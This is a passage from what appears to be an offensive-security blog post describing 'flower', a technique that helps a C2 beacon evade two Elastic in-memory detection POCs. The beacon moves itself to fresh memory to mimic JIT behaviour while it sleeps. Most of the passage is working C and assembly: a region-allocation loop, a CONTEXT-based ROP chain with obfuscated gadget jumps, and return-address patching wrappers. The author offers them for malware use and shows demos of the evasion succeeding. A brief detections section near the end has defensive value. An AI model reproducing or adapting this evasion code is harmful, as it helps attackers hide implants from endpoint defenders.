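constexpr std::uint32_t kExec = 0x10, kExecRead = 0x20, kExecReadWrite = 0x40, kExecWriteCopy = 0x80;

// Assumed helper bodies; the POC only shows the names.
inline bool IsExecutable(std::uint32_t p) {
    return (p & (kExec | kExecRead | kExecReadWrite | kExecWriteCopy)) != 0;
}
inline bool IsWritable(std::uint32_t p) {
    return (p & (kReadWrite | kWriteCopy | kExecReadWrite | kExecWriteCopy)) != 0;
}

class FluctuationModel {
public:
    // Feed one protection change; returns true when it would raise an alert.
    bool OnProtect(std::uint32_t pid, std::uint64_t base,
                   std::uint32_t last_mask, std::uint32_t new_mask) {
        const bool becomes_immutable =
            (!IsExecutable(last_mask) && IsExecutable(new_mask)) ||
            (IsWritable(last_mask) && !IsWritable(new_mask));
        if (!becomes_immutable)
            return false;
        // insert() reports whether the page was already recorded for this process.
        const bool newly_recorded = immutable_pages_[pid].insert(base).second;
        return !newly_recorded;
    }

private:
    std::map<std::uint32_t, std::set<std::uint64_t>> immutable_pages_;
};
```

In this model the first RW to RX transition of a page is recorded silently, RX to RW is ignored, and the second RW to RX on the same page of the same process raises the alert.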

the silly overlap

There is (understandably) some overlap between those two POCs: in both cases we need to avoid fluctuating and thus break the chain between each RW->RX toggle. Ironically, EtwTi-FluctuationMonitor had the answer for us all this time.

// Proper JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute [-> Free]
// YOLO JIT: Allocate(RWX) -> memcpy(code) -> execute
// Bad JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute -> Protect(RW) -> re-use for new code
// Fluctuation: ... -> Protect(RX) -> execute -> Protect(~X) [-> encrypt] -> Protect(RX) -> ...

We just need to behave like “proper” JIT (I am following their definitions) and we’ll be fine. Optionally and as always we could just stay in a .NET RWX JIT region and chill there, simple and works, on top of being less suspicious than “mockingjay” by a mile; but eh that’s a bit boring isn’t it ?

the silly solution

The solution presented here is stupid but works; does that mean the detections are stupid ? ~~Yes~~ No, but it goes to show how attackers can masquerade as legit behavior, even if in a stupid way, to slip through detections.

the modified ropchain

By making our beacon move itself in memory we can simulate JIT behavior and slip through an honest gap in those detections.

I say JIT, but I am aware it’s a dollar store version of it; I am only calling it this because it’s the very behavior that the aforementioned POCs have to account for to not have too many FPs.

The following allows this:

This ropchain logic I codename flower

This slips through CFG-FindHiddenShellcode, as the “new region” was never previously executable and thus does not count as a hidden page, and through EtwTi-FluctuationMonitor, since it looks like we are doing “proper” JIT ( RW->memcpy->RX->FREE ).

we’re so back !

allocation from the dollar store

To flow through memory, we try to allocate a new region at a given offset from ourselves in memory. It’s worth noting you could totally omit this and just allocate a new region and ball. We do this simply to avoid going in a region where we were previously, not that I think it would matter.

TL;DR: cuz i can and i will

FUNC PVOID FwpMemPrepare(  
        _In_ PFLOWER_CTX Ctx,  
        _In_ ULONG Size  
) {  
    PVOID Memory    = { 0 };  
    ULONG Offset    = FW_BASE_OFS;  
    ULONG Prot      = PAGE_READWRITE;  
  
  
    //  
    // try allocating a new region till we are successful    
    // if an allocation fails, increment the base offset from    
    // the shellcode base by ShiftOfs    
    //    
    PRINTF( "[FLOWER] [*] Trying to allocate NxtBuf @ %p\n", C_PTR( U_PTR( SHC_START() ) + Offset ) );  
    while ( TRUE ) {  
        if ( ! ( Memory = Ctx->Win32.VirtualAlloc(  
                C_PTR( U_PTR( SHC_START() ) + Offset ),  
                Size,  
                ( MEM_COMMIT | MEM_RESERVE ),  
                Prot  
        ) ) ) {  
            Offset += FW_SHIFT_OFS;  
            continue;  
        }  
        PRINTF( "[FLOWER] [*] NxtBuf allocated @ %p\n", Memory );  
        break;  
    }  
  
    return Memory;  
}
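One thing to keep in mind with the loop above is that it never gives up if every candidate address is taken. A portable sketch of the same probing idea with an attempt budget follows; `ProbeForRegion` and the `try_alloc` callback are hypothetical (the callback plays the role VirtualAlloc has in the snippet), and returning 0 on failure is my choice.

```cpp
#include <cstdint>
#include <functional>

// Probe base + offset, shifting the offset after each failure, for at most
// max_attempts tries. Returns the first address accepted by try_alloc, or 0.
inline std::uint64_t ProbeForRegion(std::uint64_t base,
                                    std::uint64_t first_offset,
                                    std::uint64_t shift,
                                    unsigned max_attempts,
                                    const std::function<bool(std::uint64_t)>& try_alloc) {
    std::uint64_t offset = first_offset;
    for (unsigned attempt = 0; attempt < max_attempts; ++attempt) {
        const std::uint64_t candidate = base + offset;
        if (try_alloc(candidate))
            return candidate;
        offset += shift;  // same idea as Offset += FW_SHIFT_OFS
    }
    return 0;             // give up instead of looping forever
}
```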

the “ropchain”

For demonstration purposes and to show this technique just works we’ll make a helper function that generates an array of CONTEXT structs so you can use them with EKKO/ZILEAN/FOLIAGE/… (also because it’s surprisingly easier to write and understand)

The signature of the function is the following

FUNC NTSTATUS FwRopChain(  
        _In_  PFLOWER_CTX   Ctx,  
        _In_  ULONG         Delay,  
        _In_  PCONTEXT      RopInit,  
        _In_  PVOID         NxtBuf,  
        _In_  ULONG         Flags,  
        _Out_ PCONTEXT*     Rop,  
        _Out_ SIZE_T*       RopLen  
)

I won’t delve into each parameter, as the comments in the project itself should get you going.

Also, because it’s just easier, we allocate our CONTEXT structs on the heap. We will probably not use all of them, buuuut that does not matter as we can just free them once we have crafted the ropchain.

//  
// allocate FLOWER_MAX_LEN CONTEXTs on the heap  
// we will probably not use all of them but easier like this  
//  
if ( ! NT_SUCCESS( Status = FwpRopAlloc( Ctx, Rop ) ) ) {  
    PRINTF( "[FLOWER] [-] FwpRopAlloc failed [Status: 0x%lx]\n", Status );  
    goto LEAVE;  
}

Once that’s done we can start tinkering with the ropchain itself.

OBF_JMP( Inc, Ctx->Win32.WaitForSingleObjectEx );  
Rop[ Inc ]->Rcx = U_PTR( Ctx->Evnts.Start );  
Rop[ Inc ]->Rdx = U_PTR( INFINITE );  
Rop[ Inc ]->R8  = U_PTR( FALSE );  
Inc++;

So far pretty classic, we just want to wait for the start event to be signaled.

OBF_JMP is just a macro that makes using JMP gadgets to hide the content of RIP easier and more malleable.

//  
// https://github.com/HavocFramework/Havoc/blob/main/payloads/Demon/include/core/SleepObf.h#L16  
//  
#define OBF_JMP( i, p )                                \
    if ( Flags & FLOWER_GADGET_RAX ) {                 \
        Rop[ i ]->Rax = U_PTR( p );                    \
    } else if ( Flags & FLOWER_GADGET_RDI ) {          \
        Rop[ i ]->Rdi = U_PTR( p );                    \
    } else {                                           \
        Rop[ i ]->Rip = U_PTR( p );                    \
    }

Next we want to move ourselves to the new region (duh). This can be achieved with RtlMoveMemory/RtlCopyMemory or literally any function that allows you to write a buffer somewhere.

//  
// copy ourselves to the new region  
// NOTE: can use RtlCopyMemory or literally any write function  
//  
OBF_JMP( Inc, Ctx->Win32.RtlMoveMemory )  
Rop[ Inc ]->Rcx = U_PTR( NxtBuf );  
Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcBase );  
Rop[ Inc ]->R8  = U_PTR( Ctx->ShcLength );  
Inc++;

If it wasn't clear yet, **NxtBuf** is a pointer to our "new" memory region.

Obviously, to avoid hoarding memory, we should free the old region:

OBF_JMP( Inc, Ctx->Win32.VirtualFree )  
Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );  
Rop[ Inc ]->Rdx = U_PTR( 0 );  
Rop[ Inc ]->R8  = U_PTR( MEM_RELEASE );  
Inc++;

Optionally, we zero out the old copy before freeing the region. This does flip RX to RW, however EtwTi-FluctuationMonitor doesn’t seem to be screaming at this (possible oversight?) and the time spent as a “hidden page” is so minimal we might as well disregard it, hence why I included this option.

if ( Flags & FLOWER_ZERO_PROTECT ) {  
    OBF_JMP( Inc, Ctx->Win32.VirtualProtect )  
    Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );  
    Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );  
    Rop[ Inc ]->R8  = U_PTR( PAGE_READWRITE );  
    Rop[ Inc ]->R9  = U_PTR( &Tmp );  
    Inc++;  

  
    OBF_JMP( Inc, Ctx->Win32.RtlZeroMemory )  
    Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );  
    Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );  
    Inc++;  
}

Zeroing out the old region by reallocating over it as RW, zeroing it then freeing it again will be left as an exercise to the reader

Then we can do stuff like masking our stack, encrypting etc; do remember that NxtBuf is still PAGE_READWRITE here

Of course let’s not forget to sleep else we are running but not hiding :P

//
// could totally use NtDelayExecution etc
// feel free to change
//
OBF_JMP( Inc, Ctx->Win32.WaitForSingleObjectEx )  
Rop[ Inc ]->Rcx = U_PTR( NtCurrentProcess() );  
Rop[ Inc ]->Rdx = U_PTR( Delay );  
Rop[ Inc ]->R8  = U_PTR( FALSE );  
Inc++;

Once we are done sleeping we just need to toggle NxtBuf to RX (and signal the end of the ropchain)

OBF_JMP( Inc, Ctx->Win32.VirtualProtect )  
Rop[ Inc ]->Rcx = U_PTR( NxtBuf );  
Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );  
Rop[ Inc ]->R8  = U_PTR( PAGE_EXECUTE_READ );  
Rop[ Inc ]->R9  = U_PTR( &Tmp );  
Inc++;

And then it’s GGs, we only flip the permissions once then free and that’s legit unlike “fluctuation” where we keep on flipping protections forever and ever.

can’t C me

As said previously, this technique still allows for things like stack masking and encryption, and since the only real modification is in the ropchain itself you can use any technique you like to queue the ropchain.

Evasion-wise, since we slip past those two new POCs without losing features like stack masking etc, it’s a net gain, at least for now.

what about return addresses ?

If you thought of this, good job :>

After moving, the return addresses on our stack from the nested calls in our beacon still point to the old region we were in prior to “flowing”.

;; rebase return address of calling function
;; no need to be inlined in [-Os] since we JMP to it
;; (no CALL => no new frame => no new retaddr)
;;
;; will require [-fno-omit-frame-pointer] as we need RBP (frame ptr)
;; to get the return address, the compiler in [-Os] seems to
;; prefer [ rsp + COMPILE_TIME_OFFSET ], which is not
;; function agnostic
;;
;; FwPatchRetAddr( ImgBase* [rcx], NewBase* [rdx] )
FwPatchRetAddr:
    mov r8, [ rbp + 8 ]
    sub r8, rcx
    add r8, rdx
    mov [ rbp + 8 ], r8
    ret
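
The arithmetic behind the rebasing is the same for any address inside the moved region: keep the offset, swap the base. Below is a minimal C sketch of that computation only, assuming a hypothetical helper name (`rebase_addr`) and a `length` parameter used as a sanity check; neither is part of the original code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper (not from the original project): translate an
 * address located inside the old region to the same offset inside
 * the new region.
 */
uintptr_t rebase_addr(uintptr_t addr, uintptr_t old_base,
                      uintptr_t new_base, size_t length)
{
    /* the address must actually belong to the old region */
    assert(addr >= old_base && addr - old_base < length);

    /* same arithmetic as the assembly: (addr - old) + new */
    return addr - old_base + new_base;
}
```

For instance, an address at offset 0x42 in a region based at 0x1000 ends up at offset 0x42 of the new base, whatever that base is.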

I then use it to return to the caller of Flower without crashing.

LEAVE:
    //
    // we only want to rebase our return address
    // if no Fw*Obf function failed, meaning we
    // did move
    //
    if ( ! NT_SUCCESS( Status ) ) {
        //
        // sleep with KUSER_SHARED_DATA so even if we failed
        // we can ensure that we delayed execution
        // (obv not good nor ideal but could still be important)
        //
        FwSharedSleep( Delay );

    } else FwPatchRetAddr( Ctx.ShcBase, Ctx.NxtBuf );

We need to apply the same idea to NtSignalAndWaitForSingleObject because by the time we’re done waiting for the end object, its return address points to the old, and now freed, memory region.

;; wrapper around [NtSignalAndWaitForSingleObject] to patch our retaddr
;; then JMP to the actual function in NTDLL to queue our CONTEXT based ropchain
;;
;; this is done because after queuing our ropchain, the shellcode
;; will have moved elsewhere in memory, thus if [NtSignalAndWaitForSingleObject]
;; was called directly, it would return to the old, now freed, memory (=> CRASH)
;;
;; FwRopStart( FLOWER_ROPSTART_PRM* [rcx] )
FwRopStart:
    ;; save our return address in a volatile register
    pop r10

    push r12

    ;; setup function args from struct
    mov r12, rcx
    mov r11, [ r12 ]              ; Rcx->Func
    mov rcx, [ r12 + 0x8  ]       ; Rcx->Signal
    mov rdx, [ r12 + 0x10 ]       ; Rcx->Wait
    mov r8,  [ r12 + 0x18 ]       ; Rcx->Alertable
    mov r9,  [ r12 + 0x20 ]       ; Rcx->Timeout

    ;; calculate new return address
    sub r10, [ r12 + 0x28 ]       ; Rcx->ImgBase
    add r10, [ r12 + 0x30 ]       ; Rcx->NewBase

    pop r12

    ;; patch return address of the current frame
    push r10

    ;; JMP to NtSignalAndWaitForSingleObject
    ;;
    ;; we JMP to it instead of CALL'ing it to not generate a
    ;; new frame so we can patch the retaddr of NtSignalAndWaitForSingleObject
    jmp r11         ; Rcx->Func

    ;; no ret since NtSignalAndWaitForSingleObject
    ;; will do it for us.

For easier usage we pass a struct holding our relevant parameters for the function

//
// FwRopStart wrapper struct
// idk what type safety is
//
typedef struct _FLOWER_ROPSTART {
    //
    // NtSignalAndWaitForSingleObject + args
    //
    PVOID Func;
    PVOID Signal;
    PVOID Wait;
    PVOID Alertable;
    PVOID TimeOut;

    //
    // retaddr patching
    //
    PVOID ImgBase;
    PVOID NewBase;

} FLOWER_ROPSTART_PRM, *PFLOWER_ROPSTART_PRM;
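
Since the assembly wrapper reads the struct through hardcoded offsets (0x0 to 0x30), a layout change would silently break it. One way to guard against that is a set of compile-time checks, sketched here under the assumption of a 64-bit target and a C11 compiler; the `PVOID` typedef is a stand-in so the sketch builds without the Windows headers.

```c
#include <assert.h>
#include <stddef.h>

/* stand-in for the Windows PVOID type (assumption, to build anywhere) */
typedef void *PVOID;

typedef struct _FLOWER_ROPSTART {
    PVOID Func;
    PVOID Signal;
    PVOID Wait;
    PVOID Alertable;
    PVOID TimeOut;
    PVOID ImgBase;
    PVOID NewBase;
} FLOWER_ROPSTART_PRM, *PFLOWER_ROPSTART_PRM;

/* the offsets below are the ones the assembly wrapper dereferences */
static_assert(sizeof(PVOID) == 8, "sketch assumes 64-bit pointers");
static_assert(offsetof(FLOWER_ROPSTART_PRM, Func)      == 0x00, "Func");
static_assert(offsetof(FLOWER_ROPSTART_PRM, Signal)    == 0x08, "Signal");
static_assert(offsetof(FLOWER_ROPSTART_PRM, Wait)      == 0x10, "Wait");
static_assert(offsetof(FLOWER_ROPSTART_PRM, Alertable) == 0x18, "Alertable");
static_assert(offsetof(FLOWER_ROPSTART_PRM, TimeOut)   == 0x20, "TimeOut");
static_assert(offsetof(FLOWER_ROPSTART_PRM, ImgBase)   == 0x28, "ImgBase");
static_assert(offsetof(FLOWER_ROPSTART_PRM, NewBase)   == 0x30, "NewBase");
```

If a field is ever added or reordered, the build fails instead of the wrapper reading the wrong member at runtime.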

And to craft said parameter struct I made a helper function to make the usage even easier.

FUNC NTSTATUS FwRopstartPrm(
        _In_  PFLOWER_CTX Ctx,
        _Out_ PFLOWER_ROPSTART_PRM Prm,
        _In_  HANDLE Event,
        _In_  HANDLE Wait,
        _In_  PVOID OldBase,
        _In_  PVOID NxtBase
) {
    if ( ! Ctx || ! Prm ) {
        return STATUS_UNSUCCESSFUL;
    }

    //
    // NtSignalAndWaitForSingleObject args
    //
    Prm->Func        = Ctx->Win32.NtSignalAndWaitForSingleObject;
    Prm->Signal      = Event;
    Prm->Wait        = Wait;
    Prm->Alertable   = FALSE;
    Prm->TimeOut     = NULL;

    //
    // rebasing info
    //
    Prm->ImgBase     = OldBase;
    Prm->NewBase     = NxtBase;

    return STATUS_SUCCESS;
}

We then use FwRopStart in place of NtSignalAndWaitForSingleObject and it won’t return in the old memory :)

                FLOWER_ROPSTART_PRM RopPrm = { 0 };

                //
                // ensure struct is zero'd
                //
                MmZero( &RopPrm, sizeof( FLOWER_ROPSTART_PRM ) );
                
                [ ... ]
                //
                // prepare wrapper struct for NtSignalAndWaitForSingleObject
                //
                if ( ! NT_SUCCESS( Status = FwRopstartPrm( Ctx, &RopPrm, Ctx->Evnts.Start, Thread, Ctx->ShcBase, Ctx->NxtBuf ) ) ) {
                    PRINTF( "[FLOWER] [-] Failed to prepare FLOWER_ROPSTART_PRM struct [Status: 0x%lx]\n", Status );
                    goto LEAVE;
                }

                //
                // signal the ropchain to start and wait for the thread to be done
                //
                FwRopStart( RopPrm );

And that’s pretty much it. Do know that this assumes the beacon is fully PIC; if you’re using an RDLL you might need to remap every section, which is possible but a bit annoying I guess.

You can chain this with other stuff, which is the funny thing about sleep obfuscation, I recommend you check out https://dtsec.us/2023-04-24-Sleep/ if HSB is giving you nightmares, out of scope for this post however.

Either way, may your malware get jiggy with it now.

demo

Below you can find recordings of this technique against CFG-FindHiddenShellcode and EtwTi-FluctuationMonitor (fyi, my VM is kinda slow, I don’t know if it was ever shut down).

sillyware vs ELASTIC: round 1

in action against CFG-FindHiddenShellcode

sillyware vs ELASTIC: round 2

in action against EtwTi-FluctuationMonitor

2-0

no comment

caveats

The first caveat would obviously be how you write the code: the more nested your sleep obfuscation routine is in your code (compared to the main function), the more return addresses you’ll have to patch so you don’t jump back into the old location. Not really a big caveat, however I thought I would mention it.

The second is more on the practical level: it would be way better for the beacon to be fully PIC and not an RDLL, because the former only needs to be moved into another RX region whereas an RDLL will basically need to be remapped, which is louder and has a higher overhead. U2U as always however.

Also, whilst trying to use FOLIAGE through fibers, I cannot, at this time, get it to work; without fibers it works fine however. 5pider told me that Austin was using fibers due to the high stack usage of the Cobalt Strike beacon, so fibers in our case don’t seem to be relevant when it comes to stealth.

Silly oversight or just limitation ? At this time I am unsure (not like it matters lol)

going beyond

In the realm of in-memory evasion, there are many more things to research and this was only one of them. In and of itself this technique still has some flaws, whether it’s because I lazily decided to use techniques like EKKO to showcase it or because the behavior is still a bit different from actual JIT. I hope this adds something to the table, considering “malware development” is, in current times, an overwritten topic.

Austin Hudson (ilove2pwn) made a tweet about CFG-FindHiddenShellcode, so I thought I would link it here: even though I doubt it would get around EtwTi-FluctuationMonitor, it most certainly would against CFG-FindHiddenShellcode.

JIT seems to become more and more the pet peeve of detections such as stack tracing or just memory scanning in general. This shows that it’s something worth elaborating on for both attackers and defenders alike.

detections

There is a lot of detection ground on this technique. First off, the usage of FOLIAGE/EKKO/ZILEAN to queue the modified ropchain is in itself a bit weird. As far as I know, ELASTIC is able to detect APCs trying to run NtContinue to indirectly call the necessary functions. Timer callbacks that block are also suspicious, which HSB leverages as an IOC. In upcoming times I plan on releasing a version of flower that does not rely on such techniques, thus circumventing the need for NtContinue etc.

In itself the following things are possible to detect:

That is where the third presented POC actually becomes interesting, by constructing normal process behavior profiles it would be possible to find the nuance between this and actual JIT.
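
To make the profiling idea a bit more concrete from the defender side, here is a small, purely illustrative C sketch. It assumes a scanner already has two snapshots of a process's private executable regions (how they are collected, for example by walking the address space with VirtualQueryEx, is out of scope) and counts regions that vanished and reappeared elsewhere with the same size. The `ExecRegion` type and `count_relocations` function are hypothetical names, and this is not one of ELASTIC's detections; real JIT engines also allocate and free code, so any threshold would have to come from a per-process baseline.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* hypothetical snapshot entry: one private executable region */
typedef struct {
    uintptr_t base;
    size_t    size;
} ExecRegion;

/* true if an identical region (same base and size) is in the set */
static bool contains(const ExecRegion *set, size_t n, ExecRegion r)
{
    for (size_t i = 0; i < n; i++) {
        if (set[i].base == r.base && set[i].size == r.size) {
            return true;
        }
    }
    return false;
}

/*
 * Count regions in `now` that are new, while a region of the same
 * size that existed in `prev` is gone: a "same code, new address"
 * move between two snapshots.
 */
size_t count_relocations(const ExecRegion *prev, size_t nprev,
                         const ExecRegion *now, size_t nnow)
{
    size_t moved = 0;

    for (size_t i = 0; i < nnow; i++) {
        if (contains(prev, nprev, now[i])) {
            continue; /* unchanged region */
        }
        for (size_t j = 0; j < nprev; j++) {
            if (prev[j].size == now[i].size &&
                !contains(now, nnow, prev[j])) {
                moved++;
                break;
            }
        }
    }
    return moved;
}
```

A process whose relocation count keeps climbing at a regular cadence, with no JIT engine loaded, would be worth a closer look; on its own the count proves nothing.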

I have been working on a modular and more modern usermode memory scanner that tries to hunt for IOCs that aren’t hunted for yet (at least to my knowledge); blogpost about this soon enough as well.

le funny

Sleep obfuscation is certainly cool but an easy win is still chilling in a .NET RWX region (“mockingjay” or bring your own RWX section clowns in shambles) as you aren’t stomping anything (no easily spottable discrepancies between the module in memory and on disk), it’s still legit and it’s RWX, great success.

.NET JIT is honestly a very interesting subject, I recommend you check out this blogpost by XPN: https://blog.xpnsec.com/weird-ways-to-execute-dotnet/ and this gist by dylan https://gist.github.com/susMdT/2d13330f6a5bfa482555e22430c0eb82

acknowledgments

I would first like to thank Dylan Tran (dtsec.us) for being an awesome friend, we discussed this idea a while back and he was the first one to try it. He was also the one to proofread my suboptimal English; do give his work a read, as it inspired me and I hope it will inspire others as well.

I would also like to thank ELASTIC for sharing a lot of their detections with the public, I believe this should be standard behavior for every vendor but here we are with most of those vendors being borderline scammers.

(In no special order)

Thank you for reading :)